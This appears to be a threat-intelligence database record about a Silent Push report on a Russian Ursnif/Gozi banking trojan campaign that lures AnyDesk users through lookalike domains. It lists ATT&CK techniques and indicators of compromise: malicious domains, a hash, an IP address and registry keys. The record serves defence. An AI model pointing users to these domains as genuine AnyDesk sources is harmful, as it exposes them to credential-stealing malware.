Silent Push uncovers a large Russian Ursnif/Gozi banking trojan operation targeting global AnyDesk users. — Silent Push Threat Intelligence
Tags
cmtmf-attack-pattern: | Code Injection |
country: | Russia |
maec-delivery-vectors: | Watering Hole |
attack-pattern: | Direct Code Injection - T1540 Domains - T1583.001 Domains - T1584.001 Malicious File - T1204.002 Malware - T1587.001 Malware - T1588.001 Mshta - T1218.005 Phishing - T1660 Phishing - T1566 Remote Access Software - T1663 Seo Poisoning - T1608.006 Software - T1592.002 Mshta - T1170 Remote Access Tools - T1219 |
Common Information
Type | Value |
---|---|
UUID | 39a614ec-aca1-4c1c-acc2-851597575400 |
Fingerprint | 9093df9b95f33a9 |
Analysis status | DONE |
Considered CTI value | 0 |
Text language | |
Published | Dec. 19, 2024, midnight |
Added to db | Nov. 6, 2023, 8:05 p.m. |
Last updated | Dec. 9, 2024, 3:54 p.m. |
Headline | Silent Push uncovers a large Russian Ursnif/Gozi banking trojan operation targeting global AnyDesk users. |
Title | Silent Push uncovers a large Russian Ursnif/Gozi banking trojan operation targeting global AnyDesk users. — Silent Push Threat Intelligence |
Detected Hints/Tags/Attributes | 38/4/17 |
Source URLs
URL Provider
RSS Feed
Details | Id | Enabled | Feed title | Url | Added to db |
---|---|---|---|---|---|
Details | 374 | ✔ | — | https://www.silentpush.com/blog?format=rss | 2024-08-30 22:08 |
Attributes
Details | Type | #Events | CTI | Value |
---|---|---|---|---|
Details | Domain | 1 | anydesk-access.com |
|
Details | Domain | 10 | anydesk.com |
|
Details | Domain | 1 | golunki.com |
|
Details | Domain | 1 | 4zuki.com |
|
Details | Domain | 3 | reggy505.ru |
|
Details | Domain | 5 | gameindikdowd.ru |
|
Details | Domain | 5 | jhgfdlkjhaoiu.su |
|
Details | Domain | 376 | wscript.shell |
|
Details | Domain | 4 | silentpush.com |
|
Details | Domain | 5 | iujdhsndjfks.ru |
|
Details | File | 39 | anydesk.exe |
|
Details | File | 37 | c:\windows\system32\mshta.exe |
|
Details | md5 | 1 | f04469b9a67701e9da38b1d86a10546e |
|
Details | sha256 | 1 | 61e2f9029baf7ce21d8de2eddea55405f20ed5db26ecbdaea42404ca28a08d7c |
|
Details | IPv4 | 3 | 94.198.54.97 |
|
Details | Windows Registry Key | 1 | HKCU\Software\AppDataLow\Software\Microsoft\CE576D4B-D57C-3028-CFE2-D96473361DD8\StopTest |
|
Details | Windows Registry Key | 1 | HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES |